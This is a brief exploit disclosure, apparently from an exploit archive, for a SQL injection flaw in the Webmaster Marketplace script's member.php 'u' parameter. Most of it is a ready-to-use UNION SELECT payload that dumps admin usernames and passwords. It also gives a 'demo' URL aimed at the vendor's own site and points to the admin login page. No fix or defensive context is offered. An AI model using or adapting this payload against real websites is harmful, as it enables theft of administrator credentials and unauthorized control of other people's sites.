id: 4403
date: 12/10/2008
title: Webmaster Marketplace (member.php u) SQL Injection Vulnerability
author: Hussin X
cves: 

================================================================
Webmaster Marketplace (member.php u) SQL Injection Vulnerability
================================================================


Webmaster Marketplace (member.php u) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

___________________________________

script  : http://www.unscripts.com/MPS.html

DorK : :(

exploit :
_______

http://www.site.com/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--



Demo :
_______

http://www.unscripts.com/MPS/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--


login :
http://www.site.com/Admin/login.php



#  0day.today [2023-03-25]  #